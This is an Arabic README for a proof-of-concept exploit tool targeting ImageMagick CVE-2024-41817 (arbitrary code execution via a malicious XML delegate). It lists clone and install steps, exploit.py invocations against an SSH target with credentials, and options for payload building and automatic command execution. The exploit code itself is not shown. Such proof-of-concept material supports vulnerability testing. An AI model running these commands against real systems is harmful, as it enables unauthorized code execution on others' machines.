
CVE-2024-41817 POC ImageMagick <= 7.1.1-35 تنفيذ أكواد عشوائية
إثبات المفهوم لاستغلال ImageMagick الإصدارات <= 7.1.1-35 مما يسمح بتنفيذ تعليمات برمجية عشوائية عبر تفويض XML ضار.
يستغل هذا الإكسلويت ثغرة في ImageMagick تسمح بتنفيذ تعليمات برمجية عشوائية من خلال مكتبات مصممة خصيصًا. يمكن للنص البرمجي:
git clone https://github.com/Dxsk/CVE-2024-41817-poc/
cd CVE-2024-41817-poc
pip install -r requirements.txt
python3 exploit.py -H <target> -p <port> -u <user> -P <password> -d
python3 exploit.py -c "command" -B
python3 exploit.py -c "command" -H <target> -p <port> -u <user> -P <password> -A
-c, --command: الأمر المراد تنفيذه (الافتراضي: "id")-H, --host: الهدف-p, --port: منفذ SSH (الافتراضي: 22)-u, --username: اسم مستخدم SSH-P, --password: كلمة مرور SSH-d, --detection: الكشف التلقائي عن ImageMagick إذا كان ضعيفًا-B, --build: بناء الحمولة فقط-A, --auto: الوضع التلقائي الكامل-v, --verbose: مخرجات مفصلةهذه الأداة للأغراض التعليمية فقط. استخدمها فقط ضد الأنظمة التي لديك إذن لاختبارها.